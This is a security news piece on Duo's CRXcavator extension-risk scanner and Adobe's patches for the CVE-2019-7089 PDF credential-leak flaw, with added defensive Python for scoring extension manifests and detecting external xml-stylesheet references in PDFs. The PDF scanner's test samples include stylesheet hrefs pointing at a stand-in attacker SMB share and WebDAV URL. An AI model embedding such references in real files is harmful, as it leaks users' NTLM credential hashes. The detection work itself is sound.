Over the past few years, hackers have increasingly abused Google Chrome extensions to steal people’s data, inject rogue ads into websites or hijack CPU power to mine cryptocurrency. Now, a new online scanning service aims to shed more light on the risks associated with browser extensions.
Called CRXcavator, after the .crx file type used by Google Chrome extensions, the service, built by Duo Security, lets users or company IT staff look up an extension by its unique ID or name and review its risk score before approving the installation.
“These extensions are often overlooked when it comes to assessing the security of user endpoints, even though they have increasing access to personal and corporate data with the widespread usage of Software-as-a-Service (SaaS) tools for presentations, taxes or email clients,” the Duo Security engineers said in a blog post.
Even if an extension is not intentionally malicious, it can still contain vulnerabilities in its own code or in that of its dependencies, and some of these flaws can be exploited by malicious websites or by malicious code injected into legitimate websites.
In addition, an extension that is safe today might not be safe tomorrow: there have been cases where malicious actors acquired extensions from their original developers and then added rogue code to them. Together, these factors make manual review of every extension by enterprise security teams a nearly impossible task.
“The set of permissions an extension requests gives a good indicator of how concerned a reviewer might need to be, so CRXcavator is built on understanding the implications of the various permissions that are available for an extension to request,” the researchers said. “We have categorized and assigned an objective numerical risk score to each permission to help a security team have a metric to use when triaging extension analysis.”
In addition to that, 94,059 extensions “do not have default-src or connect-src in the CSP defined,” the researchers said. “These are the parts of the CSP that give developers the ability to restrict which external resources the extensions can access and where the extensions can send the data they collect.”
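The two checks described above, weighting requested permissions and looking for a content_security_policy that lacks default-src or connect-src, are easy to reproduce against a manifest.json. The following Python script is an added example written for this article; it is not CRXcavator's code, the per-permission weights are invented for illustration (Duo's actual scoring table is not reproduced here), and the two sample manifests, including the hosts intranet.example.com and api.example.com, are constructed.

```python
import json

# Hypothetical per-permission risk weights, chosen for illustration only.
PERMISSION_RISK = {
    "<all_urls>": 10,        # read and modify every site the user visits
    "nativeMessaging": 6,    # can talk to a native host binary outside the browser
    "webRequestBlocking": 5,
    "cookies": 5,
    "webRequest": 4,
    "history": 4,
    "tabs": 3,
    "clipboardRead": 3,
    "activeTab": 1,
    "storage": 1,
    "alarms": 0,
}
HOST_WILDCARD_RISK = 6       # host patterns such as "*://*/*" or "https://*/*"
HOST_SPECIFIC_RISK = 1       # a single named origin such as "https://intranet.example.com/*"
UNKNOWN_PERMISSION_RISK = 2  # anything not in the table still counts for something

def _host_weight(pattern):
    """Weight a host permission by whether its host part contains a wildcard."""
    host = pattern.split("://", 1)[1].split("/", 1)[0]
    return HOST_WILDCARD_RISK if "*" in host else HOST_SPECIFIC_RISK

def permission_score(manifest):
    """Return (total, [(permission, weight), ...]) over both permission lists."""
    findings = []
    for p in manifest.get("permissions", []) + manifest.get("optional_permissions", []):
        w = _host_weight(p) if "://" in p else PERMISSION_RISK.get(p, UNKNOWN_PERMISSION_RISK)
        findings.append((p, w))
    return sum(w for _, w in findings), findings

def parse_csp(csp):
    """Split a CSP string into {directive: [source, ...]}."""
    policy = {}
    for directive in csp.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy

def csp_issues(manifest):
    """Flag a policy that does not restrict where the extension can load from or send data to."""
    raw = manifest.get("content_security_policy")
    if isinstance(raw, dict):                 # Manifest V3 nests the policy under extension_pages
        raw = raw.get("extension_pages", "")
    if not raw:                               # key absent: Chrome's Manifest V2 default applies
        raw = "script-src 'self'; object-src 'self'"
    policy = parse_csp(raw)
    issues = [f"missing {d}" for d in ("default-src", "connect-src") if d not in policy]
    for d, sources in policy.items():
        if "*" in sources:
            issues.append(f"{d} allows any origin (*)")
        if "'unsafe-eval'" in sources:
            issues.append(f"{d} allows 'unsafe-eval'")
    return issues

def risk_report(manifest_json):
    manifest = json.loads(manifest_json)
    total, findings = permission_score(manifest)
    return {"name": manifest.get("name"), "permission_score": total,
            "permissions": findings, "csp_issues": csp_issues(manifest)}

# Constructed sample manifests: a broad one with no CSP at all, and a tightened one.
WEAK_MANIFEST = json.dumps({
    "name": "Example Tab Helper", "manifest_version": 2,
    "permissions": ["tabs", "<all_urls>", "storage"],
})
HARDENED_MANIFEST = json.dumps({
    "name": "Example Tab Helper", "manifest_version": 2,
    "permissions": ["activeTab", "storage", "https://intranet.example.com/*"],
    "content_security_policy": "default-src 'self'; connect-src https://api.example.com; "
                               "script-src 'self'; object-src 'self'",
})

if __name__ == "__main__":
    for m in (WEAK_MANIFEST, HARDENED_MANIFEST):
        print(json.dumps(risk_report(m), indent=2))
```

The weak manifest scores 14 and is flagged for missing default-src and connect-src, because the MV2 default policy only covers script-src and object-src; the hardened one scores 3 with no CSP findings. The unknown-permission fallback matters in practice: an unrecognised permission should raise the score, not silently drop out of it.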
Adobe Takes Another Stab at Patching PDF Callback Exploit
Adobe Systems has released its second update for Adobe Reader and Acrobat in less than two weeks, to fix a vulnerability that lets attackers capture NTLM credential hashes simply by tricking users into opening a PDF file.
The vulnerability, tracked as CVE-2019-7089, was discovered and publicly disclosed in January by researcher Alex Inführ on his blog. It abuses the xml-stylesheet feature of the XML Forms Architecture (XFA), an XML structure used to define forms and other elements inside a PDF, to make the reader send information to a remote SMB or WebDAV server automatically, without user interaction.
The technique can be used to steal hashed credentials for NTLMv2, the authentication mechanism used on Windows networks, and is very similar to a different technique disclosed last year called BadPDF.
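A defender's first question is whether a given PDF carries such a reference at all. The following Python scanner is an added example, not code from Inführ's disclosure or from Adobe: it looks for xml-stylesheet processing instructions whose href points at a UNC path or a URL, searching both the raw file and every Flate-compressed stream it can inflate, since XFA packages are normally stored in compressed streams. The exact form of the published proof of concept is not reproduced here; the check flags only the generic shape of an external stylesheet reference. The sample PDFs are constructed (they are not valid PDFs, just enough structure for the regexes), and 10.0.0.5 stands in for an attacker-controlled SMB/WebDAV host.

```python
import re
import zlib

# Processing instruction that pulls in an XSLT stylesheet, e.g. <?xml-stylesheet href="..."?>
XML_STYLESHEET_PI = re.compile(rb"<\?xml-stylesheet\b(.*?)\?>", re.IGNORECASE | re.DOTALL)
HREF_ATTR = re.compile(rb"""href\s*=\s*["']([^"']*)["']""", re.IGNORECASE)
# Body of a PDF stream object; XFA packages usually sit Flate-compressed in one of these
STREAM_BODY = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# UNC path (\\host\share), scheme-relative (//host) or any scheme:// URL counts as external
EXTERNAL_HREF = re.compile(rb"^(\\\\|//|[a-z][a-z0-9+.-]*://)", re.IGNORECASE)

def _views(pdf_bytes):
    """Yield the raw file, then every stream body that inflates cleanly."""
    yield pdf_bytes
    for m in STREAM_BODY.finditer(pdf_bytes):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # not Flate-compressed: the raw view already covers uncompressed streams

def find_external_stylesheets(pdf_bytes):
    """Return the sorted set of external hrefs used by xml-stylesheet PIs anywhere in the PDF."""
    hits = set()
    for view in _views(pdf_bytes):
        for pi in XML_STYLESHEET_PI.finditer(view):
            for href in HREF_ATTR.findall(pi.group(1)):
                if EXTERNAL_HREF.match(href):
                    hits.add(href.decode("latin-1"))
    return sorted(hits)

def _pdf_with_flate_stream(payload):
    """Wrap payload in a minimal PDF-like skeleton with one Flate-compressed stream (constructed)."""
    body = zlib.compress(payload)
    return (b"%PDF-1.7\n1 0 obj\n<< /Length " + str(len(body)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + body + b"\nendstream\nendobj\n%%EOF\n")

# Constructed samples: an XFA fragment pointing at an SMB share, a local one, and an
# uncompressed WebDAV-style reference sitting directly in the file body.
XFA_UNC = rb'<form><?xml-stylesheet type="text/xsl" href="\\10.0.0.5\share\x.xsl"?></form>'
XFA_LOCAL = rb'<form><?xml-stylesheet type="text/xsl" href="layout.xsl"?></form>'
SAMPLE_SMB = _pdf_with_flate_stream(XFA_UNC)
SAMPLE_BENIGN = _pdf_with_flate_stream(XFA_LOCAL)
SAMPLE_WEBDAV_PLAIN = b'%PDF-1.7\n<?xml-stylesheet href="http://10.0.0.5/dav/x.xsl"?>\n%%EOF\n'

if __name__ == "__main__":
    for name, pdf in (("smb", SAMPLE_SMB), ("benign", SAMPLE_BENIGN), ("webdav", SAMPLE_WEBDAV_PLAIN)):
        print(name, find_external_stylesheets(pdf) or "clean")
```

Two caveats for real use: streams with other or chained filters (for example ASCIIHex or ASCII85 before Flate) need their own decoders before this check sees the XML, and a hit only says the document asks the reader to fetch something external; whether the reader honours it is exactly what the Adobe patches change.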
Adobe released a patch for this vulnerability on Patch Tuesday, Feb. 12, but shortly afterwards Inführ found a way to bypass the patch and notified the company. Adobe released a new patch last week to address the bypass, so companies should upgrade to the latest Reader and Acrobat versions as soon as possible.